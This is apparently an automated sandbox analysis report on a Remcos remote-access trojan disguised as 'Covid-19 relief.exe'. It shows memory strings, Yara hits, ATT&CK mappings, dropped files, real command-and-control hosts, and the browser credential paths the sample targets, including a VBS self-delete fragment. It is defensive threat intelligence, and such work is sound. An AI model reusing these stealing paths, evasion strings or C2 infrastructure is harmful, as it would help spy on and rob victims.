            Source: Covid-19 relief.exe, 00000001.00000002.921950434.0000000001160000.00000002.00000001.sdmp, RegAsm.exe, 00000002.00000002.921540631.0000000001630000.00000002.00000001.sdmp, Covid-19 relief.exe, 00000003.00000002.922405058.0000000001130000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: Covid-19 relief.exe, 00000001.00000002.921950434.0000000001160000.00000002.00000001.sdmp, RegAsm.exe, 00000002.00000002.921540631.0000000001630000.00000002.00000001.sdmp, Covid-19 relief.exe, 00000003.00000002.922405058.0000000001130000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 00000002.00000002.921497745.0000000001426000.00000004.00000040.sdmpBinary or memory string: Program Manager380KR
            Source: logs.dat.2.drBinary or memory string: [ Program Manager ]
            Source: RegAsm.exe, 00000002.00000002.921497745.0000000001426000.00000004.00000040.sdmpBinary or memory string: Program Manager0|
            Source: RegAsm.exe, 00000002.00000002.921497745.0000000001426000.00000004.00000040.sdmpBinary or memory string: |Program Manager
            Source: Covid-19 relief.exe, 00000001.00000002.921950434.0000000001160000.00000002.00000001.sdmp, RegAsm.exe, 00000002.00000002.921540631.0000000001630000.00000002.00000001.sdmp, Covid-19 relief.exe, 00000003.00000002.922405058.0000000001130000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: RegAsm.exe, 00000002.00000002.921497745.0000000001426000.00000004.00000040.sdmpBinary or memory string: |Program Manager|
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004124A0 cpuid 2_2_004124A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,2_2_00409E7D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,5_2_00409E7D
            Source: C:\Users\user\Desktop\Covid-19 relief.exeQueries volume information: C:\Users\user\Desktop\Covid-19 relief.exe VolumeInformation
            Source: C:\Users\user\Desktop\Covid-19 relief.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Covid-19 relief.exeQueries volume information: C:\Users\user\Desktop\Covid-19 relief.exe VolumeInformation
            Source: C:\Users\user\Desktop\Covid-19 relief.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402580 GetLocalTime,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,printf,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,CreateThread,2_2_00402580
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00412163 GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00412163

            Stealing of Sensitive Information:

            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.926179641.0000000004061000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.927946901.0000000005CC0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.926940095.0000000005E10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4584, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5568, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Covid-19 relief.exe PID: 5676, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Covid-19 relief.exe PID: 1320, type: MEMORY
            Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Covid-19 relief.exe.6440000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Covid-19 relief.exe.6440000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.Covid-19 relief.exe.6430000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.Covid-19 relief.exe.6430000.3.raw.unpack, type: UNPACKEDPE
            Contains functionality to steal Chrome passwords or cookiesShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data2_2_0040710F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data2_2_0040710F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data (5_2_0040710F)
            Contains functionality to steal Firefox passwords or cookies
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ (2_2_0040728F)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: \key3.db (2_2_0040728F)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ (5_2_0040728F)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: \key3.db (5_2_0040728F)

            Remote Access Functionality:

            Detected Remcos RAT
            Source: Covid-19 relief.exe, 00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmp; String found in binary or memory: Remcos_Mutex_Inj
            Source: Covid-19 relief.exe, 00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmp; String found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
            Source: RegAsm.exe; String found in binary or memory: Remcos_Mutex_Inj
            Source: RegAsm.exe, 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp; String found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
            Source: Covid-19 relief.exe, 00000003.00000002.926179641.0000000004061000.00000004.00000001.sdmp; String found in binary or memory: Remcos_Mutex_Inj
            Source: Covid-19 relief.exe, 00000003.00000002.926179641.0000000004061000.00000004.00000001.sdmp; String found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
            Source: RegAsm.exe; String found in binary or memory: Remcos_Mutex_Inj
            Source: RegAsm.exe, 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp; String found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
            Yara detected Remcos RAT
            Source: Yara match; File source: 00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.926179641.0000000004061000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.927946901.0000000005CC0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.926940095.0000000005E10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 4584, type: MEMORY
            Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 5568, type: MEMORY
            Source: Yara match; File source: Process Memory Space: Covid-19 relief.exe PID: 5676, type: MEMORY
            Source: Yara match; File source: Process Memory Space: Covid-19 relief.exe PID: 1320, type: MEMORY
            Source: Yara match; File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.2.Covid-19 relief.exe.6440000.3.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.2.Covid-19 relief.exe.6440000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 1.2.Covid-19 relief.exe.6430000.3.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 1.2.Covid-19 relief.exe.6430000.3.raw.unpack, type: UNPACKEDPE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: cmd.exe (2_2_00402B8A)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: cmd.exe (5_2_00402B8A)

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Native API 1 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 1 | OS Credential Dumping 1 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
            Default Accounts | Command and Scripting Interpreter 1 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 111 | Account Discovery 1 | Remote Desktop Protocol | Input Capture 111 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | Service Execution 2 | Windows Service 1 | Access Token Manipulation 1 | Obfuscated Files or Information 3 | Credentials In Files 2 | System Service Discovery 1 | SMB/Windows Admin Shares | Clipboard Data 2 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Windows Service 1 | Software Packing 3 | NTDS | File and Directory Discovery 3 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Remote Access Software 1 | SIM Card Swap | Carrier Billing Fraud |
            Cloud Accounts | Cron | Network Logon Script | Process Injection 322 | DLL Side-Loading 1 | LSA Secrets | System Information Discovery 42 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol 1 | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 11 | Cached Domain Credentials | Security Software Discovery 111 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol 11 | Jamming or Denial of Service | Abuse Accessibility Features |
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 2 | DCSync | Virtualization/Sandbox Evasion 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation 1 | Proc Filesystem | Process Discovery 3 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
            Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 322 | /etc/passwd and /etc/shadow | Application Window Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
            Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Hidden Files and Directories 1 | Network Sniffing | System Owner/User Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | |
            Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | Remote System Discovery 1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | |

            Behavior Graph

            [Behavior graph image not reproduced. Graph ID: 319675; Sample: Covid-19 relief.exe; Start date: 18/11/2020; Architecture: WINDOWS; Score: 100]

            Top-level signatures shown on the graph: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 6 other signatures.

            Process tree recovered from the graph:
            • Covid-19 relief.exe (started): drops C:\Users\user\AppData\Roaming\Covid-19 (PE32) and C:\Users\user\...\Covid-19:Zone.Identifier (ASCII); signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process; Hides that the sample has been downloaded from the Internet (zone.identifier). Starts RegAsm.exe and a second Covid-19 relief.exe.
            • RegAsm.exe (started by Covid-19 relief.exe): contacts chaseric.ddns.net (194.5.97.21, 24002, 49748, 49750, DANILENKODE, Netherlands) and chaseric.hopto.org; drops C:\Users\user\AppData\Roaming\...\logs.dat (ASCII); signatures: Contains functionality to steal Chrome passwords or cookies; Contains functionality to capture and log keystrokes; Contains functionality to inject code into remote processes; Contains functionality to steal Firefox passwords or cookies.
            • Covid-19 relief.exe (second instance): signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process. Starts two RegAsm.exe processes.

            Screenshots

            [Screenshot thumbnails not reproduced.]

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            Covid-19 relief.exe | 40% | ReversingLabs | ByteCode-MSIL.Trojan.Wacatac
            Covid-19 relief.exe | 100% | Joe Sandbox ML |

            Dropped Files

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Roaming\Covid-19 | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Roaming\Covid-19 | 40% | ReversingLabs | ByteCode-MSIL.Trojan.Wacatac

            Unpacked PE Files

            Source | Detection | Scanner | Label
            1.2.Covid-19 relief.exe.6430000.3.unpack | 100% | Avira | BDS/Backdoor.Gen
            2.2.RegAsm.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
            3.2.Covid-19 relief.exe.6440000.3.unpack | 100% | Avira | BDS/Backdoor.Gen
            5.2.RegAsm.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            chaseric.hopto.org | 194.5.97.21 | true | false | | unknown
            chaseric.ddns.net | 194.5.97.21 | true | true | | unknown

                URLs from Memory and Binaries

                Name | Source | Malicious | Antivirus Detection | Reputation
                https://management.azure.com/Chttps://login.microsoftonline.com | Covid-19 relief.exe | false | | high
                https://login.microsoftonline.com | Covid-19 relief.exe | false | | high
                https://management.azure.com/subscriptions/ | Covid-19 relief.exe | false | | high
                https://management.azure.com/ | Covid-19 relief.exe | false | | high

                        Contacted IPs

                        Public

                        IP | Domain | Country | ASN | ASN Name | Malicious
                        194.5.97.21 | unknown | Netherlands | 208476 | DANILENKODE | true

                        General Information

                        Joe Sandbox Version: 31.0.0 Red Diamond
                        Analysis ID: 319675
                        Start date: 18.11.2020
                        Start time: 14:53:42
                        Joe Sandbox Product: CloudBasic
                        Overall analysis duration: 0h 8m 0s
                        Hypervisor based Inspection enabled: false
                        Report type: full
                        Sample file name: Covid-19 relief.exe
                        Cookbook file name: default.jbs
                        Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of new started processes analysed: 20
                        Number of new started drivers analysed: 0
                        Number of existing processes analysed: 0
                        Number of existing drivers analysed: 0
                        Number of injected processes analysed: 0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode: default
                        Analysis stop reason: Timeout
                        Detection: MAL
                        Classification: mal100.troj.spyw.evad.winEXE@9/3@17/1
                        EGA Information: Failed
                        HDC Information:
                        • Successful, ratio: 18.5% (good quality ratio 11.7%)
                        • Quality average: 46.7%
                        • Quality standard deviation: 42.1%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 55
                        • Number of non-executed functions: 277
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        Warnings:
                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.139.144, 13.64.90.137, 51.11.168.160, 92.122.213.194, 92.122.213.247, 8.241.11.126, 8.248.113.254, 8.241.9.126, 67.26.139.254, 8.248.119.254, 52.155.217.156, 20.54.26.129
                        • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        Time | Type | Description
                        14:54:37 | API Interceptor | 1084x Sleep call for process: RegAsm.exe modified

                        Joe Sandbox View / Context

                        IPs

                        Match | Associated Sample Name / URL | Detection
                        194.5.97.21 | IRS-RELIEF.exe | malicious
                        194.5.97.21 | rGFP17RAXv.exe | malicious
                        194.5.97.21 | LM9ccxRLFs.exe | malicious
                        194.5.97.21 | RAURRr6KZR.exe | malicious

                                Domains

                                Match | Associated Sample Name / URL | Detection | Context (IP)
                                chaseric.ddns.net | IRS-RELIEF.exe | malicious | 194.5.97.21
                                chaseric.hopto.org | IRS-RELIEF.exe | malicious | 194.5.97.21

                                ASN

                                Match | Associated Sample Name / URL | Detection | Context (IP)
                                DANILENKODE | tax-relief.exe | malicious | 194.5.97.166
                                DANILENKODE | Ref-BID PRICE.exe | malicious | 194.5.98.252
                                DANILENKODE | 1ttmgYD97B.exe | malicious | 194.5.99.163
                                DANILENKODE | 2mtUEXin7W.exe | malicious | 194.5.99.163
                                DANILENKODE | wk59hOo880.exe | malicious | 194.5.99.163
                                DANILENKODE | BCVaSYrgmG.exe | malicious | 194.5.99.163
                                DANILENKODE | 30203490666.exe | malicious | 194.5.98.199
                                DANILENKODE | InSppuoN2s.exe | malicious | 194.5.98.196
                                DANILENKODE | Av01vC7kS1.exe | malicious | 194.5.97.155
                                DANILENKODE | yb1rlaFJuO.exe | malicious | 194.5.99.163
                                DANILENKODE | 1MwYrZqjEy.exe | malicious | 194.5.99.163
                                DANILENKODE | IRS-RELIEF.exe | malicious | 194.5.97.21
                                DANILENKODE | Jvdivmn_Signed_.exe | malicious | 194.5.97.38
                                DANILENKODE | myupsfile.exe | malicious | 194.5.97.38
                                DANILENKODE | dO50wcBKmS.exe | malicious | 194.5.97.155
                                DANILENKODE | Booking Confirmation 11042024251 - copy - PDF.exe | malicious | 194.5.97.146
                                DANILENKODE | IMG2020_.exe | malicious | 194.5.97.168
                                DANILENKODE | New Sales.exe | malicious | 194.5.98.100
                                DANILENKODE | Booking Confirmation 110420203251 - copy - PDF.exe | malicious | 194.5.97.146
                                DANILENKODE | 6duZ9HSt0F.exe | malicious | 194.5.98.17

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Roaming\Covid-19
                                Process:C:\Users\user\Desktop\Covid-19 relief.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):560640
                                Entropy (8bit):7.092997016800572
                                Encrypted:false
                                SSDEEP:6144:oL+0RTQHdWvvurs1UGKuOYmk3auPnfyuSkwzAT0Yne6cjnuQwG2U9bZ8BjAPuE5x:b0x4YvWgqe1fSDzY3e6caBGV9b3PuIT
                                MD5:5DD2C165636EFF7F866E18370351101E
                                SHA1:1A25C2D60553096A67B3C87C6385D3E831E84647
                                SHA-256:E85DE613ABEF99E65212DCD6F8077B03763FA37FA81E7921907C9E9C3859B632
                                SHA-512:2B70590453ACAD83096DA738C43F2CD2060F654999B485FB4873D2F2D82875E5D659C0616698D75A1EA78E7AEA625E9B5A34F3211B5288CF71151D0087BA48E5
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 40%
                                Reputation:low
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._................................. ... ....@.. ..............................m.....@.....................................S.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................H...........e...........<...{..........................................6..(....o....*B...(.....o....&*2.(....t....*.(....&*2.t....o....*F~....~....(.....*..*..(....*.(.........(....(.........(....(....o.........*&...o....*.(....*.(....*.r#..p.....*..{%...*..{&...*..{'...*r.(......}%.....}&.....}'...*..{5...*..{6...*V.(......}5.....}6...*. ...N )UU.Z()....{5...o/...X )UU.Z(+....{6...o0...X*J.s<....sB...o2...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*
                                C:\Users\user\AppData\Roaming\Covid-19:Zone.Identifier
                                Process:C:\Users\user\Desktop\Covid-19 relief.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview: [ZoneTransfer]....ZoneId=0
                                C:\Users\user\AppData\Roaming\remcos\logs.dat
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):74
                                Entropy (8bit):4.7652538331522365
                                Encrypted:false
                                SSDEEP:3:ttVPwA2yArA4RXMRPHv31aeo:t4A2bXqdHv3IP
                                MD5:9CEF22D83CEF7595DDD6342F8185EB58
                                SHA1:8CF40A7F465CE527BC0C85A39452FC884386057E
                                SHA-256:FA0797C727ED6676658DAA728CFD161E8A380BDCD7498FB2B58CC3060122CDBF
                                SHA-512:3E1E2DB88FCBD27153F5CEB46EFA4FB518999367D6DB9A3E2E5C73951FED608D44BB86AAEA56C8F00DDF64617EF1B88CB1FDBDD222F81CE8F8D947477F6140E5
                                Malicious:true
                                Reputation:low
                                Preview: ..[2020/11/18 14:54:37 Offline Keylogger Started]....[ Program Manager ]..

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.092997016800572
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:Covid-19 relief.exe
                                File size:560640
                                MD5:5dd2c165636eff7f866e18370351101e
                                SHA1:1a25c2d60553096a67b3c87c6385d3e831e84647
                                SHA256:e85de613abef99e65212dcd6f8077b03763fa37fa81e7921907c9e9c3859b632
                                SHA512:2b70590453acad83096da738c43f2cd2060f654999b485fb4873d2f2d82875e5d659c0616698d75a1ea78e7aea625e9b5a34f3211b5288cf71151d0087ba48e5
                                SSDEEP:6144:oL+0RTQHdWvvurs1UGKuOYmk3auPnfyuSkwzAT0Yne6cjnuQwG2U9bZ8BjAPuE5x:b0x4YvWgqe1fSDzY3e6caBGV9b3PuIT
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_................................. ... ....@.. ..............................m.....@................................

                                File Icon

                                Icon Hash:07d8d8d4d4d85106

                                Static PE Info

                                General

                                Entrypoint:0x461dee
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x5FB4E4F8 [Wed Nov 18 09:10:16 2020 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:v4.0.30319
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
